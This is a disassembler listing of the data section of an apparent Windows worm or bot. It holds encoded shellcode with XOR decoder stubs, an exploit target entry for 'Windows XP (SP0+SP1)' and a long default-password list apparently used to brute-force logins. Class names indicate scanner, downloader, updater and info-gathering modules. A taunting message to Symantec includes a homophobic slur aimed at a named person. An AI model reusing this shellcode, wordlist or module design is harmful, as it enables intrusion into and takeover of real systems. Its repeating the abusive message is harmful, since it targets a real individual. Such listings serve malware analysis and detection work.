dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4243C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_41279D+37Ao
; sub_412E61+1B3o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd offset aBadAllocation ; "bad allocation"
dd offset dword_41EF24+4
dword_424528 dd 4Eh ; DATA XREF: sub_4022DF+81o
; sub_4022DF+C8r ...
dd 7 dup(0)
dword_424548 dd 8Bh ; DATA XREF: sub_4022DF+401r
; sub_4028E0+77r ...
dword_42454C dd 0 ; DATA XREF: sub_4028E0:loc_402931r
; sub_41AD0F+A8r ...
off_424550 dd offset sub_41AFF3 ; DATA XREF: sub_413DDD+20Cr
; sub_413DDD+31Dr ...
dd 4Dh, 7 dup(0)
dd 599h, 0
dd offset sub_41B7A3
dd 53h, 7 dup(0)
dd 0B97h, 0
dd offset sub_41AD0F
dd 0Bh dup(0)
dd offset aBadAllocatio_0 ; "bad allocation"
dd offset aBadAllocatio_1 ; "bad allocation"
dword_4245E0 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41AD0F+7Fo
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
byte_4257F4 db 0 ; DATA XREF: sub_4148FB:loc_4149CFr
; sub_4148FB:loc_414AE8r
a__ db 0Ah
db 0Dh,'\_/.',0
dword_4257FC dd 0EFFFC481h, 44FFFFh, 41EF84h ; DATA XREF: sub_41AFF3+321o
dword_425808 dd 42Ah ; DATA XREF: sub_41AFF3+2CBr
dword_42580C dd 3E8h ; DATA XREF: sub_41AFF3+4DBr
dword_425810 dd 258h ; DATA XREF: sub_41AFF3+318r
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dword_425824 dd 20804h ; DATA XREF: sub_41AFF3+4F4r
; sub_41AFF3+500r ...
dd offset aBadAllocatio_2 ; "bad allocation"
dd offset aBadAllocatio_3 ; "bad allocation"
off_425830 dd offset byte_41EF1B ; DATA XREF: sub_41B7A3:loc_41B880r
; sub_41B7A3+EEo
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem_0 ; "system"
dd offset aServer ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aBadAllocatio_4 ; "bad allocation"
dd offset aBadAllocatio_5 ; "bad allocation"
dd offset aBadAllocatio_6 ; "bad allocation"
dd offset aBadAllocatio_7 ; "bad allocation"
dd offset aBadAllocatio_8 ; "bad allocation"
dd offset aBadAllocatio_9 ; "bad allocation"
dd offset aBadAllocati_10 ; "bad allocation"
dword_425A7C dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
; DATA XREF: sub_4148FB+7Do
dd 0F3E2FEEBh, 0
dword_425A98 dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
; DATA XREF: sub_4148FB+192o
dd 0F3E2FEEBh, 2 dup(0)
dword_425AB8 dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
; DATA XREF: sub_414B1C+37o
dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h, 0EB40DA03h
dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
dd 38B048Bh, 7275C3C5h, 6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h, 1C708B0Ch
dd 8408BADh, 408B09EBh, 7C408D34h, 953C408Bh, 0E4E8EBFh
dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h, 0EB525353h
dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
dd 0FFFFh, 0
dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
dd 8000h, 80h, 420178h
dword_425BA8 dd 0 ; DATA XREF: sub_4172D0+6Er
dword_425BAC dd 0 ; DATA XREF: sub_4172D0+75r
dd 0
dd 0FF000000h, 0
dd 0FFFF0000h, 0
dd 0FFFFFF00h, 0
dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
dd 0FFFFFF00h, 0FFFFFFFFh
dword_425BE8 dd 0 ; DATA XREF: sub_4172D0+8Br
dword_425BEC dd 80000000h ; DATA XREF: sub_4172D0+91r
dd 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 80000000h, 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 0
dd offset dword_420178+10h
dd offset aBadAllocati_11 ; "bad allocation"
aZQvapODdmQpd db '§µ±ï¢ ¯¸®´²¤¤¬¸ï¯¤µ',0
dd 7Bh dup(0)
dword_425E30 dd 80h dup(0) ; DATA XREF: sub_41C2E2+42Do
dd 0B5A71309h, 0AEB8EFB1h, 0AFA0A2B4h, 0A4A4B2B5h, 0A8EFB8ACh
dd 0AEA7AFh, 0FAh dup(0)
dd 13090000h, 0EFB1B5A7h, 0ADB3AEB6h, 0A9A7AEA5h, 0EFB1A8B8h
dd 0AEA7AFA8h, 0FBh dup(0)
dd 1309h
aHfsknidfrvhfkk db 'hFSKniDFrvHFkKSe',0 ; DATA XREF: sub_419F0A:loc_419F35o
; sub_419F0A+44r
align 4
dd 1Bh dup(0)
aTtzf db 'â⇔',0 ; DATA XREF: sub_41802D+2A9o
; sub_41802D+375o ...
align 10h
dd 3Eh dup(0)
aFtfss db '”’”™™',0 ; DATA XREF: sub_41802D+2FFo
; sub_41802D+38Fo
align 10h
dd 4 dup(0)
byte_4269D0 db 2Eh ; DATA XREF: sub_417E66+E4r
byte_4269D1 db 0ECh, 0B9h, 0 ; DATA XREF: sub_41802D+3A5o
dd 0Dh dup(0)
db 0
aIbDImdqmin db '벤¹¸µ¨¬¤ï¬¨',0 ; DATA XREF: sub_41802D+611o
dd 0Ch dup(0)
db 0
aVQdD db '¢³²²²ï¤¹¤',0 ; DATA XREF: sub_401DA7+63o
; sub_417776+B8o ...
align 4
dd 1Dh dup(0)
db 0
aVutttttttt db '‚“’’’’’’’’',0 ; DATA XREF: sub_41C2E2+2DDo
dd 0Bh dup(0)
db 0
byte_426B01 db 96h, 0A8h, 0AFh ; DATA XREF: sub_417776+A4o
; sub_417909+7Co ...
dd 92E1F3F2h, 0B3B4A2A4h, 0E1B8B5A8h, 0B7B3A492h, 0A4A2A8h
dd 3Bh dup(0)
dword_426C04 dd 8 ; DATA XREF: sub_417C7B+174r
; sub_417C7B+1B1r
word_426C08 dw 1D0Dh ; DATA XREF: sub_401E4D:loc_401F01r
byte_426C0A db 1 ; DATA XREF: sub_40177B+8Fr
; sub_4019F3+8Fr
align 4
dword_426C0C dd 0B1B5B5A9h, 0B6EEEEFBh, 0A9EFB6B6h, 0A4A5A5A8h, 0A4A6A0AFh
; DATA XREF: sub_41AFF3+40Bo
dd 0A2EFB5AFh, 0ADEEACAEh, 0A0B3A3A8h, 0ACEEB8B3h, 0A4EFB2B8h
dd 0A4B9h
dword_426C38 dd 87F484F8h, 0F3F3F184h, 0F6F8F5F6h, 0F0F4F9F3h, 83F8F7F0h
; DATA XREF: sub_40177B+7Co
dd 87F08383h, 0F9F98080h, 0F0F3F1F3h, 0F087F284h, 85F687F0h
dd 0F885F482h, 0F2F58084h, 0F8F7F8F6h, 8082F485h, 87F8F8F2h
dd 0F3F2F3F5h, 0F9F08784h, 0F1858783h, 0F4858084h, 848380F3h
dd 85F4F080h, 0F6878487h, 0F7F8F980h, 0F8878087h, 0F8F587F6h
dd 0F384F585h, 0F38382F8h, 0F385F580h, 848587F5h, 0F687F7F6h
dd 0F9F384h, 71h dup(0)
dword_426E78 dd 0F58084F8h, 0F184F487h, 0F2F787F9h, 0F783F1F7h, 0F5F8F8F3h
; DATA XREF: sub_4019F3+7Co
dd 0F5F8F280h, 0F7F3F885h, 82F3F187h, 8082F885h, 87858782h
dd 0F6F68085h, 85F5F4F9h, 83F0F0F4h, 84F3F685h, 85F4F082h
dd 0F28787F9h, 0F6F3F7F9h, 0F38485F1h, 8283F887h, 0F9838580h
dd 0F8F084F5h, 80F382F9h, 0F58285F8h, 0F484F4F9h, 0F5F48285h
dd 83F4F5F3h, 80828480h, 0F3858782h, 0F0F9F3F3h, 0F4828585h
dd 82F980F3h, 0F2F6F5h, 10h dup(0)
aPivk db 'ˆ‚Š',0 ; DATA XREF: sub_41881F+27o
; sub_418884+254o
align 10h
db 0
aSatt db '‘€’’',0 ; DATA XREF: sub_418884+17Co
align 4
db 2 dup(0)
aFtdu db '”’„“',0 ; DATA XREF: sub_418884+265o
align 10h
db 3 dup(0)
aSipj db '‘ˆ†',0 ; DATA XREF: sub_41802D+1CFo
dd 0
aSopj db '‘ކ',0 ; DATA XREF: sub_41802D+22Fo
align 4
db 0
aKivk db 'Šˆ‚Š',0 ; DATA XREF: sub_41802D+1DFo
align 4
db 2 dup(0)
aLoip db '‹Žˆ',0 ; DATA XREF: sub_41802D+2ECo
; sub_41802D+355o
align 4
db 3 dup(0)
aMoed db 'ŒŽ…„',0 ; DATA XREF: sub_41802D+365o
align 10h
aSuicmtj db '‘“ˆ—Œ’†',0 ; DATA XREF: sub_417B51+A4o
; sub_41802D+1EFo
align 10h
aDearSymantecFo db 'Dear Symantec: For years I have longed for just one thing, to mak'
db 'e malware with just the right sting, you detected my creation and'
db ' got my domains killed, but I will not stop, I can rebuild. P.S. '
db 'Fuck you assholes, especially Stephen Doherty who is the biggest '
db 'faggot I know of.',0
align 4
dd offset aBadAllocati_12 ; "bad allocation"
dd offset aBadAllocati_13 ; "bad allocation"
dword_4270B0 dd 5348h, 420598h, 4205B4h, 4207A8h, 4207B8h, 4207ECh
; DATA XREF: sub_41946E+20o
; sub_41946E+8Eo
dd 4207FCh, 420814h
dword_4270D0 dd 80000002h, 80000001h ; DATA XREF: sub_41A2D8+6Bo
dword_4270D8 dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_41A10B+3Do
dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
dd 9, 7D8AAFA8h, 0F4BE11C9h, 8, 1Dh dup(0)
dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
dd 9, 5EB02EBh, 0FFFFF9E8h, 0FFh, 1Dh dup(0)
dd 9, 420B2Ch
off_4273F4 dd offset off_41D39C ; DATA XREF: fabskl8p:00421044o
; fabskl8p:00421064o
dd 0
a_?avclsmodule@ db '.?AVclsModule@@',0
off_42740C dd offset off_41D39C ; DATA XREF: fabskl8p:0042108Co
; fabskl8p:004210B4o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_42742C dd offset off_41D39C ; DATA XREF: fabskl8p:004210DCo
; fabskl8p:00421100o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_42744C dd offset off_41D39C ; DATA XREF: fabskl8p:00420F9Co
; fabskl8p:0042114Co ...
dd 0
a_?avexception@ db '.?AVexception@std@@',0
off_427468 dd offset off_41D39C ; DATA XREF: fabskl8p:00421128o
; fabskl8p:00421180o ...
align 10h
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_427484 dd offset off_41D39C ; DATA XREF: fabskl8p:004211A8o
; fabskl8p:004211CCo
dd 0
a_?avmdlupd@@ db '.?AVmdlUPD@@',0
align 4
off_42749C dd offset off_41D39C ; DATA XREF: fabskl8p:004211F4o
; fabskl8p:00421218o
dd 0
a_?avmdldl@@ db '.?AVmdlDL@@',0
off_4274B0 dd offset off_41D39C ; DATA XREF: fabskl8p:00421240o
; fabskl8p:00421264o
align 8
a_?avmdlipt@@ db '.?AVmdlIPT@@',0
align 4
off_4274C8 dd offset off_41D39C ; DATA XREF: fabskl8p:0042128Co
; fabskl8p:004212B0o
align 10h
a_?avmdlijn@@ db '.?AVmdlIJN@@',0
align 10h
off_4274E0 dd offset off_41D39C ; DATA XREF: fabskl8p:004212D8o
; fabskl8p:004212FCo
align 8
a_?avmdliquit@@ db '.?AVmdlIQUIT@@',0
align 4
off_4274F8 dd offset off_41D39C ; DATA XREF: fabskl8p:00421324o
; fabskl8p:00421348o
align 10h
a_?avmdlhttpinf db '.?AVmdlHTTPInfo@@',0
align 4
off_427514 dd offset off_41D39C ; DATA XREF: fabskl8p:00421370o
; fabskl8p:00421394o
dd 0
a_?avmdls4stop@ db '.?AVmdlS4Stop@@',0
off_42752C dd offset off_41D39C ; DATA XREF: fabskl8p:004213BCo
; fabskl8p:004213E0o
dd 0
a_?avmdls4@@ db '.?AVmdlS4@@',0
off_427540 dd offset off_41D39C ; DATA XREF: fabskl8p:00421408o
; fabskl8p:0042142Co
align 8
a_?avmdlnetinfo db '.?AVmdlNetInfo@@',0
align 4
off_42755C dd offset off_41D39C ; DATA XREF: fabskl8p:00421454o
; fabskl8p:00421478o
dd 0
a_?avmdlsysinfo db '.?AVmdlSysInfo@@',0
align 4
off_427578 dd offset off_41D39C ; DATA XREF: fabskl8p:004214A0o
; fabskl8p:004214C4o
align 10h
a_?avmdlscansta db '.?AVmdlScanStats@@',0
align 4
off_427594 dd offset off_41D39C ; DATA XREF: fabskl8p:004214ECo
; fabskl8p:00421510o
dd 0
a_?avmdlscansto db '.?AVmdlScanStop@@',0
align 10h
off_4275B0 dd offset off_41D39C ; DATA XREF: fabskl8p:00421538o
; fabskl8p:0042155Co
align 8
a_?avmdlscanner db '.?AVmdlScanner@@',0
align 4
dd 5 dup(0)
dword_4275E0 dd 0 ; DATA XREF: sub_4031FF+4w
; sub_403305+3r
dword_4275E4 dd 0 ; DATA XREF: sub_403417+2Bo
; .text:loc_41CD71w ...
align 10h
dword_4275F0 dd 0 ; DATA XREF: sub_403417:loc_40343Br
; sub_403417+32w
dword_4275F4 dd 0 ; DATA XREF: sub_4044D2-C3w
; sub_40AF90:loc_40AFA2r ...
dd 0
dword_4275FC dd 0 ; DATA XREF: sub_40428Dr
; sub_40FA72+15r ...
dword_427600 dd 0 ; DATA XREF: sub_404A3E+8Fw
; fabskl8p:off_41D408o
dword_427604 dd 0 ; DATA XREF: sub_404A3E+99w
dd 0
dword_42760C dd 0 ; DATA XREF: sub_404A3E+8Aw
dd 10h dup(0)
dword_427650 dd 0 ; DATA XREF: sub_404A3E+BFw
; sub_404A3E+DFr
align 8
dword_427658 dd 0 ; DATA XREF: sub_404A3E+7Bw
; fabskl8p:0041D40Co
dd 22h dup(0)
word_4276E4 dw 0 ; DATA XREF: sub_404A3E+4Fw
align 4
word_4276E8 dw 0 ; DATA XREF: sub_404A3E+48w
align 4
word_4276EC dw 0 ; DATA XREF: sub_404A3E+41w
align 10h
word_4276F0 dw 0 ; DATA XREF: sub_404A3E+3Aw
align 4
dword_4276F4 dd 0 ; DATA XREF: sub_404A3E+26w
dword_4276F8 dd 0 ; DATA XREF: sub_404A3E+20w
dword_4276FC dd 0 ; DATA XREF: sub_404A3E+1Aw
dword_427700 dd 0 ; DATA XREF: sub_404A3E+14w
dword_427704 dd 0 ; DATA XREF: sub_404A3E+Ew
dword_427708 dd 0 ; DATA XREF: sub_404A3E+9w
dword_42770C dd 0 ; DATA XREF: sub_404A3E+60w
dword_427710 dd 0 ; DATA XREF: sub_404A3E+68w
; sub_404A3E+85r
word_427714 dw 0 ; DATA XREF: sub_404A3E+33w
align 4
dword_427718 dd 0 ; DATA XREF: sub_404A3E+57w
dword_42771C dd 0 ; DATA XREF: sub_404A3E+70w
word_427720 dw 0 ; DATA XREF: sub_404A3E+2Cw
align 4
dd 80h dup(0)
dword_427924 dd 0 ; DATA XREF: sub_404DF4+15w
; sub_404DF4+1Dw ...
word_427928 dw 0 ; DATA XREF: sub_405019+E7w
align 4
dd 2 dup(0)
dword_427934 dd 4E4h ; DATA XREF: sub_405019+C3w
dword_427938 dd 0 ; DATA XREF: sub_405019+CBw
dword_42793C dd 0 ; DATA XREF: sub_405019+D3w
dword_427940 dd 0 ; DATA XREF: sub_402C75+6r
; sub_402DB5+6r ...
dd 8 dup(0)
off_427964 dd offset sub_4055A6 ; DATA XREF: sub_405886+30w
; sub_405886+51r ...
off_427968 dd offset sub_4456F4 ; DATA XREF: sub_4055AF+10r
; sub_405886+3Dw ...
off_42796C dd offset sub_44F3CF ; DATA XREF: sub_4056CA+44r
; sub_405886+4Aw ...
dword_427970 dd 454A20h ; DATA XREF: sub_4055D9+Br
; sub_405886+5Ew ...
align 8
dword_427978 dd 15B418h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_405C31+4o
; .data:off_423800o
dword_427990 dd 15B440h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423808o
dword_4279A8 dd 15B468h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423818o
dd 15B490h, 0FFFFFFFFh, 4 dup(0)
dword_4279D8 dd 15B4B8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423830o
dd 15B4E0h, 0FFFFFFFFh, 4 dup(0)
dd 15B508h, 0FFFFFFFFh, 4 dup(0)
dword_427A20 dd 15B530h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423850o
dword_427A38 dd 15B558h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423860o
dd 15B580h, 0FFFFFFFFh, 4 dup(0)
dd 15B5A8h, 0FFFFFFFFh, 4 dup(0)
dword_427A80 dd 15B5D0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423880o
dd 15B6D8h, 0FFFFFFFFh, 4 dup(0)
dd 15B700h, 0FFFFFFFFh, 4 dup(0)
dword_427AC8 dd 0A00000h ; DATA XREF: sub_402E11+7Cr
; sub_4039CF+62r ...
dword_427ACC dd 0 ; DATA XREF: sub_405E8D+21w
; sub_405F00+21Cr ...
dword_427AD0 dd 0 ; DATA XREF: sub_407AEA+14r
; sub_407AEA+29r ...
dword_427AD4 dd 0 ; DATA XREF: sub_40E422+19Er
dword_427AD8 dd 2 ; DATA XREF: sub_4044D2-138w
; sub_407CB6:loc_407CDEr ...
dword_427ADC dd 0A28h ; DATA XREF: sub_4044D2-121w
dword_427AE0 dd 501h ; DATA XREF: sub_4044D2-132w
